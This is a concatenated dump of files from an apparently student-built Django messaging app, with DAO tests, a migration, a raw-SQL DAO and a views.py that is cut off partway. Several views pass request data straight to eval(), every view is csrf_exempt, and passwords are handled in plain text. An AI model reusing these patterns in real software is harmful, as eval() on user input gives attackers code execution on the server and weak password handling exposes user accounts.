"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'CF'\n\n\nfrom django.test import TestCase\nfrom adam2014.DAO.AddFriendDAO import *\nfrom adam2014.DAO.GroupMessageDAO import *\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.models import Message\nfrom adam2014.models import TextMessage\nfrom adam2014.models import PictureMessage\nfrom adam2014.models import VoiceMessage\nfrom adam2014.models import LocationMessage\nimport datetime\n\nclass GroupMessageDAOTest(TestCase):\n def setUp(self):\n \t# 假设群组里面有3个人\n \t# 名字为“helloworld”\n \t# creator是self.user\n\n \t# 其中self.user发送了一条文字信息\n \t# self.user2发送了一条语音信息\n \t# self.user3发送了一条图片信息\n \t# self.user3发送了一条位置信息\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.group1 = {\"id\":1,\"code\":\"this_is_code\",\"name\":\"helloworld\",\"ucount\":3,\"creater_id\":1}\n\n Group.objects.create(**self.group1)\n\n self.textMessage = {\"id\":1,\"type\":1,\"content_id\":1} # 文字\n self.voiceMessage = {\"id\":2,\"type\":2,\"content_id\":2} # 语音\n self.pictureMessage = {\"id\":3,\"type\":3,\"content_id\":3} #图片\n self.locationMessage = {\"id\":4,\"type\":4,\"content_id\":4} #位置\n\n Message.objects.create(**self.textMessage)\n Message.objects.create(**self.voiceMessage)\n Message.objects.create(**self.pictureMessage)\n Message.objects.create(**self.locationMessage)\n\n self.message1 = {\"id\":1,\"time\":self.time,\"user_from_id\":1,\"group_to_id\":1,\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":self.time,\"user_from_id\":2,\"group_to_id\":1,\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":3}\n self.message4 = {\"id\":4,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":4}\n\n GroupMessage.objects.create(**self.message1)\n GroupMessage.objects.create(**self.message2)\n GroupMessage.objects.create(**self.message3)\n GroupMessage.objects.create(**self.message4)\n\n self.text = {\"id\":1,\"message_id\":1,\"content\":\"message1\"}\n self.picture = {\"id\":2,\"message_id\":2,\"content\":\"this is the binary data of a image\"}\n self.voice = {\"id\":3,\"message_id\":3,\"content\":\"this is the data of a voice file\"}\n self.location = {\"id\":4,\"message_id\":4,\"content\":\"this is data of a location\"}\n\n TextMessage.objects.create(**self.text)\n PictureMessage.objects.create(**self.picture)\n VoiceMessage.objects.create(**self.voice)\n LocationMessage.objects.create(**self.location)\n\n def testInsertGroupMessage(self):\n \t# user发送了一条信息--文本消息\n user_from_id = self.user['id']\n\n message = {\"id\":5,\"type\":1,\"content_id\":5}\n text2 = {\"id\":5,\"message_id\":5,\"content\":\"message2\"}\n \n Message.objects.create(**message)\n TextMessage.objects.create(**text2)\n\n groupmsg = {\"id\":5,\"time\":self.time,\"user_from_id\":1,\"group_to_id\":1,\"message_id\":5}\n before = len(GroupMessage.objects.all())\n # print(\"testInsertAddFriend before:\")\n # print(AddFriend.objects.all())\n insertGroupMessage(**groupmsg)\n after = len(GroupMessage.objects.all())\n # print(\"testInsertAddFriend after:\")\n # print(AddFriend.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetGroupMessageById(self):\n # print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getGroupMessageById(1).id,1)\n # print(getAddFriendById(1))\n self.assertEqual(getGroupMessageById(2).id,2)\n self.assertEqual(getGroupMessageById(3).id,3)\n self.assertEqual(getGroupMessageById(4).id,4)\n # print(getAddFriendById(2))\n\n def testUpdateGroupMessage(self):\n \tmsg = {\"id\":5,\"type\":1,\"content_id\":5}\n \tMessage.objects.create(**msg)\n\n modified_GroupMessage = {\"id\":4,\"time\":self.time,\"user_from_id\":3,\"group_to_id\":1,\"message_id\":5}\n updateGroupMessage(**modified_GroupMessage)\n self.assertEqual(getGroupMessageById(4).message_id,5)\n # print(\"testUpdateAddFriend user_from_id=2&user_to_id=1\")\n # print(getAddFriendById(1))\n\n def testDeleteGroupMessage(self):\n deleteGroupMessage(1)\n deleteGroupMessage(2)\n deleteGroupMessage(3)\n # print(\"testDeleteAddFriend id=1||2||3:\")\n # print(AddFriend.objects.all())\n\n self.assertEqual(len(GroupMessage.objects.filter(id=1)),0)\n self.assertEqual(len(GroupMessage.objects.filter(id=2)),0)\n self.assertEqual(len(GroupMessage.objects.filter(id=3)),0)\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5265700221061707,
"alphanum_fraction": 0.5716586112976074,
"avg_line_length": 23.84000015258789,
"blob_id": "2aada5c93e53917ab98f60e92de4b69820720c22",
"content_id": "b03882716df0a39059a17cc631359d4f1acdc0ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 621,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/zzc/adam2014/migrations/0002_auto_20141207_1331.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('adam2014', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='message',\n name='time',\n field=models.DateTimeField(default=datetime.datetime(2014, 12, 7, 13, 31, 19, 905587)),\n ),\n migrations.AlterField(\n model_name='user',\n name='photo',\n field=models.FileField(upload_to=b'./upload/photo/'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5976470708847046,
"alphanum_fraction": 0.6364706158638,
"avg_line_length": 49.386138916015625,
"blob_id": "b6933e336758256d0d98594cc713c5e702357634",
"content_id": "20bc7950636ac52777c891535c8d8c931180abe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5136,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 101,
"path": "/zzc/adam2014/AllTest/DAOTest/testImmediatelyMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.ImmediatelyMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.DAO.TextMessageDAO import *\nfrom adam2014.models import ImmediatelyMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nfrom adam2014.models import TextMessage\nimport datetime\n\n\nclass ImmediatelyMessageTest(TestCase):\n def setUp(self):\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n self.textmessage1 = {\"id\":1,\"content\":\"I am a txt message \",\"message_id\":1}\n self.textmessage2 = {\"id\":2,\"content\":\"I am a txt message \",\"message_id\":2}\n self.textmessage3 = {\"id\":3,\"content\":\"I am a txt message \",\"message_id\":3}\n self.textmessage4 = {\"id\":4,\"content\":\"I am a txt message \",\"message_id\":4}\n\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":1,\"content_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":1,\"content_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":1,\"content_id\":3}\n self.message4 = {\"id\":4,\"time\":str(self.time),\"type\":1,\"content_id\":4}\n\n self.immediatelyMessage1 = {\"id\":1,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":1,\"time\":str(self.time)}\n self.immediatelyMessage2 = {\"id\":2,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":2,\"time\":str(self.time)}\n\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n Message.objects.create(**self.message4)\n\n TextMessage.objects.create(**self.textmessage1)\n TextMessage.objects.create(**self.textmessage2)\n TextMessage.objects.create(**self.textmessage3)\n TextMessage.objects.create(**self.textmessage4)\n\n ImmediatelyMessage.objects.create(**self.immediatelyMessage1)\n ImmediatelyMessage.objects.create(**self.immediatelyMessage2)\n\n\n def testInsertImmediatelyMessage(self):\n textmessage5 = {\"id\":5,\"content\":\"I am a txt message \"}\n textmessage = insertTextMessage(**textmessage5)\n message5 = {\"id\":5,\"time\":str(self.time),\"type\":1,\"content_id\":textmessage.id}\n message = insertMessage(**message5)\n textmessage.message_id = message.id\n textmessage.save()\n immediatelyMessage = {\"id\":3,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":5,\"time\":str(self.time)}\n before = len(ImmediatelyMessage.objects.all())\n print(\"testInsertImmediatelyMessage before:\")\n print(ImmediatelyMessage.objects.all())\n insertImmediatelyMessage(**immediatelyMessage)\n after = len(ImmediatelyMessage.objects.all())\n print(\"testInsertImmediatelyMessage User1 to User2 : Message5\")\n print(ImmediatelyMessage.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetImmediatelyMessageById(self):\n self.assertEqual(getImmediatelyMessageById(1).id,1)\n self.assertEqual(getImmediatelyMessageById(2).id,2)\n\n def testUpdateImmediatelyMessage(self):\n time = datetime.datetime.now()\n ### time 和 self.time 秒钟级别无差别,可试着修改user_to_id 函数可行\n print(\"testUpdateImmediatelyMessage before\")\n print(getImmediatelyMessageById(1))\n immediatelyMessage = {\"id\":1,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":1,\"time\":str(self.time)}\n updateImmediatelyMessage(**immediatelyMessage)\n print(\"testUpdateImmediatelyMessage after:update time\")\n print(getImmediatelyMessageById(1))\n\n\n def testDeleteImmediatelyMessage(self):\n deleteImmediatelyMessage(1)\n deleteImmediatelyMessage(2)\n print(\"testDeleteImmediatelyMessage:all\")\n print(ImmediatelyMessage.objects.all())\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6466447710990906,
"alphanum_fraction": 0.677146852016449,
"avg_line_length": 37.76363754272461,
"blob_id": "0274611e75db88f1eaed54042b848618e36109cb",
"content_id": "2229e067bf7bfcc6cf2e547f1d02e53695967f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2131,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 55,
"path": "/zzc/adam2014/AllTest/DAOTest/testPictureMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.PictureMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import PictureMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nimport datetime\n\nclass PictureMessageTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":4,\"content_id\":1}\n self.Picturemessage1 = {\"id\":1,\"content\":\"I am a Picture message \",\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":4,\"content_id\":2}\n self.Picturemessage2 = {\"id\":2,\"content\":\"I am a Picture message \",\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":4,\"content_id\":3}\n self.Picturemessage3 = {\"id\":3,\"content\":\"I am a Picture message \",\"message_id\":3}\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n\n PictureMessage.objects.create(**self.Picturemessage1)\n PictureMessage.objects.create(**self.Picturemessage2)\n PictureMessage.objects.create(**self.Picturemessage3)\n\n def testInsertPictureMessage(self):\n PictureMessage4 = {\"id\":4,\"content\":\"I am a vioce message\"}\n PictureMessage = insertPictureMessage(**PictureMessage4)\n message4 = {\"id\":4,\"time\":str(self.time),\"type\":3,\"content_id\":PictureMessage.id}\n print(\"testInsertMessage before:\")\n message = insertMessage(**message4)\n print(Message.objects.all())\n PictureMessage.id = message.id\n\n PictureMessage.save()\n\n self.assertEqual(getPictureMessageById(4).id,4)\n\n\n def testGetPictureMessageById(self):\n self.assertEqual(getPictureMessageById(1).id,1)\n self.assertEqual(getPictureMessageById(2).id,2)\n\n\n\n def testDeletePictureMessage(self):\n deletePictureMessage(1)\n deletePictureMessage(2)\n deletePictureMessage(3)\n print(\"testDeletePictureMessage:3\")\n print(PictureMessage.objects.all())"
},
{
"alpha_fraction": 0.5526315569877625,
"alphanum_fraction": 0.6060855388641357,
"avg_line_length": 30.179487228393555,
"blob_id": "ee7eb0ee24bdba2fde2422513a4bbebaf292e2d9",
"content_id": "20b0dd279a9989c9b9e28484e45ae025ef7379e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 39,
"path": "/zzc/adam2014/DAO/JoinDAO/User_groupDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom django.db import connection\nfrom adam2014.JoinModels import User_group\n\ndef getUser_groupListView(user_id):\n sql = \"select adam2014_grouprelation.id,adam2014_grouprelation.time,\" \\\n \"adam2014_group.id,adam2014_group.name,adam2014_group.ucount,adam2014_group.code,adam2014_group.creater_id\" \\\n \" from adam2014_grouprelation,adam2014_group \" \\\n \"where adam2014_grouprelation.user_id = %s and adam2014_group.id = adam2014_grouprelation.group_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n UGs= []\n i = 0\n for i in range(len(row)):\n UGs.append(User_group.User_group(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6])))\n i+=1\n return UGs\n\n\n\n\n# user_groups = getUser_groupListView(1)\n# print(user_groups)\n# user_groups[0].printout()\n# user_groups[1].printout()\n"
},
{
"alpha_fraction": 0.5912929177284241,
"alphanum_fraction": 0.6011624336242676,
"avg_line_length": 31.626117706298828,
"blob_id": "d669159839b0836c0bdc7a730edf7eb1c6956c02",
"content_id": "49a741d6c66386f17ae8eaf03869b6aa7b5fb20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20140,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 559,
"path": "/zzc/adam2014/views.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom JoinModels import FriendRelationListView\nfrom Service import AddFriendService\nfrom Service import FriendRelationService\nfrom Service import UserService\nfrom Service import GroupService\nfrom Service import GroupRelationService\nfrom Service.JoinService import FriendRelationListViewService\nfrom Service.JoinService import Group_userService\nfrom Service.JoinService import User_groupService\nfrom adam2014.IM import easemob_server_python\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django import forms\nimport json\nfrom DAO import UserDAO\nfrom auth.Httpsession import*\nimport random\nimport datetime\n# Create your views here.\n\n@csrf_exempt\ndef helloworld(request):\n print request\n return render(request, 'adam2014/helloworld.html')\n\n\n@csrf_exempt\ndef register(request):\n\n # 前台接到{\"success\": 1}, 进入详细注册页面, 将所有的User信息POST到后台\n if request.method == \"POST\":\n # 获取数据\n\n # 判断手机号是否重复\n # 手机号重复, 返回{\"result\": 0, \"type\": 0}\n phone = request.POST['phone']\n if UserDAO.validateExistPhone(phone):\n # 如果手机号重复, 注册失败\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n password = request.POST['password']\n nickname = request.POST['nickname']\n #latitude = request.POST['latitude']\n #longitude = request.POST['longitude']\n code = int(random.uniform(100000, 999999))\n\n # 如果code存在的话,random到没有为止\n while UserDAO.validateExistCode(code):\n code = int(random.uniform(100000, 999999))\n\n # 判断value是否超过数据库最大限长\n # 长度超过限制{\"result\": 0, \"type\": 1}\n if len(nickname) > 32 or len(phone) > 11 or len(password) > 16:\n return HttpResponse(json.dumps({\"result\": 0, \"type\": \"1\"}))\n\n # 构造dict\n new_user = {\"phone\": phone, \"password\": password, \"nickname\": nickname, \"contacts_version\": \"0\",\n \"code\": code}\n\n # 插入新User\n u = UserService.newUser(**new_user)\n if u == \"error\":\n # 数据库插入失败, 返回{\"result\": 0, \"type\": 2}\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 2}))\n else:\n #adam2014中user注册后,应该注册django的user\n UserRegister(code, password)\n try:\n # 环信注册\n easemob_server_python.addEasemobUser(code, code)\n except:\n # 环信注册失败\n # 环信注册失败, 返回{\"result\": 0, \"type\": 3}\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 3}))\n\n # 成功, 返回{\"result\": 1, \"id\": user.id}\n return HttpResponse(json.dumps({\"result\": 1, \"id\": u.id}))\n\n\n# Author by Joe\n@csrf_exempt\ndef signin(request):\n \"\"\"\n # 前台统一两种方式登录(POST), usercode(类似于微信号) + password + type || userphone(用户的手机号) + password + type\n # POST格式: {\"phone\": \"\", \"password\": \"\", \"type\": 2}, {\"code\": \"\", \"password\": \"\", \"type\": 1}\n # type表示登录方式,1表示手机usercode登录,2表示手机号登录\n # 返回消息类型两种{success:0, type=0}(代表登录失败,原因: 用户名或密码错误)、{success:1, id:id}(登录成功)\n # {success:0, type=1}(登录失败,原因: 其他非密码错误原因) Ps: 前台需使用id,所以成功时返回id\n \"\"\"\n\n # print request\n # return HttpResponse(\"hello\")\n\n # log_type = request.POST['type']\n password = request.POST['password']\n\n # 没有密码直接返回失败\n if not password:\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n # 目前只有手机登录\n log_type = 2\n\n # 判断登录方式\n # Usercode登录\n if log_type == 1:\n # 获取code\n code = request.POST[\"code\"]\n\n #从自建User表中验证User信息\n exist = UserDAO.validateUserByCode(code, password)\n if exist:\n # 拉取User信息\n user = UserDAO.getUserByCode(code)\n # 登录Django自带User模块,成功返回success:1, 失败返回success:2\n \n if UserLogin(request, code, password):\n pass\n else: # 其他原因, 例如数据库崩掉之类的\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1}))\n\n #django模块登陆成功,将当前user用户写入session,\n\n ############### 登陆并上线环信账号\n dict_user = user.toDict()\n #print(Dict_user)\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n request.session['user']=dict_user\n request.session['user_id']=user.id\n\n #json.loads将传输在网络上的json转换为python本地的dict词典对象\n #json_string = json.loads(request.session['user'])\n #print(json_string)\n #print(json_string['code'])\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\":dict_user}))\n\n # 用户名或密码错误\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n # phone登录\n if log_type == 2:\n\n # 获取\n phone = request.POST[\"phone\"]\n\n exist = UserDAO.validateUserByPhone(phone, password)\n\n if exist:\n user = UserDAO.getUserByPhone(phone)\n\n # 登录Django自带User模块,成功返回 result:1, 失败返回 result:2\n if UserLogin(request, user.code, password):\n pass\n else:\n # django模块登陆失败 type: 1\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1}))\n\n\n #django模块登陆成功,将当前user用户写入session,\n\n ############### 登陆并上线环信账号\n dict_user = user.toDict()\n\n #print(Dict_user)\n # 用str转成它的文件名\n dict_user['photo'] = str(dict_user['photo'])\n # 将小数转成string,不然json放不进去\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n request.session['user']=dict_user\n request.session['user_id']=user.id\n\n #model.toJSON,转成了string对象才能放入json传输给前台\n #print(request.session['user'])\n\n #json.loads将传输在网络上的json转换为python本地的dict词典对象\n #json_string = json.loads(request.session['user'])\n #print(json_string)\n #print(json_string['code'])\n\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\": dict_user}))\n # 用户名或密码错误 type: 0\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n#退出登陆\n@csrf_exempt\ndef signout(request):\n try:\n UserLogoff(request)\n except:\n return HttpResponse(json.dumps({\"result\": 0}))\n return HttpResponse(json.dumps({\"result\": 1}))\n\n#测试session\n@csrf_exempt\ndef readSession(request):\n print(request.session['user'])\n return HttpResponse(json.dumps({\"result\": 1}))\n\n\n# 比对前后台通讯录是否一致\n# Author by Joe\n@csrf_exempt\ndef F5contact(request):\n # 前台传来用户(POST): {\"id\": \"\", \"version\": \"\"}\n # 后台返回: 1、{\"success\": 0, \"friendlist\": \"\", \"group\": \"\",}(前台后台通讯录版本不一致, 需更新前台的通讯录)\n # 2、{\"success\": 1, \"friendlist\": \"\"}(前台后台通讯录版本一致)\n\n # print request\n\n # 验证用户是否登录\n if UserVerify(request):\n\n userid = request.POST['id']\n version = request.POST['contacts_version']\n\n # 拉用户信息\n user = UserDAO.getUserById(userid)\n\n # 判断版本号是否一致\n if int(version) == int(user.contacts_version):\n # 版本号一致\n return HttpResponse(json.dumps({\"result\": 1}))\n\n else:\n # 拉取通讯录信息\n # friend = AddFriendService.getAddFriendByuser_from_id(userid)\n # groups = UserService.getuser_Groups(userid)\n groups = User_groupService.getUser_groups(userid)\n friend = FriendRelationListViewService.getFriendRelationListView(userid)\n\n # 将所有好友数据转成json\n frs = {}\n i = 0\n if friend:\n for i in range(len(friend)):\n frs[i] = friend[i].object2dict()\n i += 1\n\n # 将所有群组数据转成json\n grs = {}\n j = 0\n if groups:\n for j in range(len(friend)):\n grs[j] = groups[j].object2dict()\n j += 1\n\n print i\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1, \"friends\": frs, \"groups\": grs, \"contacts_version\": user.contacts_version, \"friend_count\": i, \"groups_count\": j}))\n else:\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n\n#前台登陆完接收到user对象,内有version,与客户端进行匹配,发送True请求传输新的好友列表\n@csrf_exempt\ndef getFRandGroups(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n\n #loading出来的是一个列表,内部是一个个object,未序列化\n obj_Friends = FriendRelationListViewService.getFriendRelationListView(user_id)\n #创建一个数组,将object序列化为dict后放入dic_Friends,再放入json传给前台\n dic_Friends = []\n for i in range(len(obj_Friends)):\n dic_Friends.append(obj_Friends[i].object2dict())\n\n #loading出用户所有加入的小组\n obj_groups = User_groupService.getUser_groups(user_id)\n dic_Groups = []\n for i in range(len(obj_groups)):\n dic_Groups.append(obj_groups[i].object2dict())\n\n return HttpResponse(json.dumps({\"result\": 1, \"all_friends\":dic_Friends,'all_groups':dic_Groups}))\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#获取一个好友的最新信息(存在于数据库内),地理位置\n\n#应该再写一个函数,由客户端直接请求好友客户端发送位置,好友再决定是否发送\n@csrf_exempt\ndef getPSN(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n user_to_id = request.POST['user_to_id']\n obj_Friend = FriendRelationListViewService.getAfriendRelationView(user_id,user_to_id)\n dic_Friend = []\n dic_Friend.append(obj_Friend[0].object2dict())\n return HttpResponse(json.dumps({\"result\": 1, \"friend\":dic_Friend}))\n\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#编辑用户自己的信息,这里只能修改nickname\n@csrf_exempt\ndef editinfo(request):\n if UserVerify(request):\n nickname = request.POST['nickname']\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n user.nickname = nickname\n user.save()\n dict_user = user.toDict()\n\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\":dict_user}))\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#定义UserFrom来接收用户的头像\nclass UserForm(forms.Form):\n user_photo = forms.FileField()\n\n@csrf_exempt\ndef editphoto(request):\n if UserVerify(request):\n if request.method == \"POST\":\n uf = UserForm(request.POST,request.FILES)\n if uf.is_valid():\n #获取表单信息\n user_photo = uf.cleaned_data['user_photo']\n #修改photo名字,用时间戳生成放防止重复\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n\n suffix = user_photo._name.split(\".\")[1]\n # datetime.datetime.now().strftime('%Y%m%d%H%M%S')+'.'+suffix\n user_photo._name = user.code+'.'+suffix\n originfilepath = './static/upload/photo/'\n originfilepath += user_photo._name\n if os.path.isfile(originfilepath):\n os.remove(originfilepath)\n #写入数据库,并保存图片\n user.photo = user_photo\n user.save()\n dict_user = user.toDict()\n #序列化user返回给前台\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n return HttpResponse(json.dumps({\"result\": 1,'user':dict_user}))\n return HttpResponse(json.dumps({\"result\": -1}))\n\n# Author by Lao605\n@csrf_exempt\ndef addfriend(request):\n if UserVerify(request):\n request_user_phone = request.POST['request_user_phone']\n user = UserService.getUserByPhone(request_user_phone)\n result = 0\n if user is not None:\n result = user.code\n\n ## 想要添加的好友存在,则应该往数据库增加一条addfriend的记录\n user_from_id = request.session['user_id']\n user_to_id = user.id\n now = datetime.datetime.now()\n af = {'user_from_id':user_from_id,'user_to_id':user_to_id,'time':now}\n AddFriendService.newAddFriend(**af)\n\n ### 这里应该通知环信,用户要添加好友的消息,环信在另外的好友上线之后将添加消息推送给他\n return HttpResponse(json.dumps({\"result\":result,'usercode':user.code}))\n\n else:# 还没登陆\n result = -1\n\n return HttpResponse(json.dumps({\"result\":result}))\n\n\n# Author by Lao605\n@csrf_exempt\ndef confirm_addfriend(request):\n if UserVerify(request):\n confirmed = request.POST['confirmed']\n result = 0\n if confirmed == \"YES\":\n #当前应该是B用户在确认\n # 如果confirmed为YES的话就说明后面会接上那个request_user_phone\n request_user_code = request.POST['request_user_code'] # 他人的手机\n user_to = UserService.getUserByCode(request_user_code)\n user_to_id = user_to.id\n\n user_from = request.session['user']\n user_from_id = user_from['id']\n time = datetime.datetime.now()\n inBlackList = False\n remark = \" \"\n top = False\n new_relation = {\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":time,\"inBlackList\":inBlackList,\"remark\":remark,\"top\":top}\n # result1是暂时存放结果的\n result1 = FriendRelationService.newFriendRelation(**new_relation)\n ##新增好友后A、B两个用户的version都应该加一\n user_A = UserService.getUserById(user_from_id)\n user_B = UserService.getUserById(user_to_id)\n user_A.contacts_version=user_A.contacts_version+1\n user_B.contacts_version=user_B.contacts_version+1\n user_A.save()\n user_B.save()\n\n if result1 is \"error\":\n result = 0\n else:\n # 返回的是FriendRelation对象\n result = 1\n if confirmed == \"NO\":\n # 如果confirmed为NO的话就这样结束了,不用去检查request_user_phone等数据\n result = 3\n else:\n # 还没登陆\n result = 2\n\n return HttpResponse(json.dumps({\"success\":result}))\n\n\n@csrf_exempt\ndef invitefriend(request):\n json_string = eval(request.POST[\"data\"])\n phonenum = json_string[\"phonenum\"]\n\n result = {\n \"success\":1,\n }\n return HttpResponse(json.dumps(result))\n\n@csrf_exempt\ndef updatePSN(request):\n if UserVerify(request):\n json_string = eval(request.POST['data'])\n latitude = json_string['latitude']\n longitude =json_string['longitude']\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n user.longitude = longitude\n user.latitude = latitude\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n\n@csrf_exempt\ndef setfriend(request):\n if UserVerify(request):\n json_string = eval(request.POST[\"data\"])\n user_to_id = json_string['user_to_id']\n inBlackList = json_string['inBlackList']\n remark = json_string['remark']\n top = json_string['top']\n user_from_id = request.session['user_id']\n\n if len(remark) > 32:\n return HttpResponse(json.dumps({\"result\": 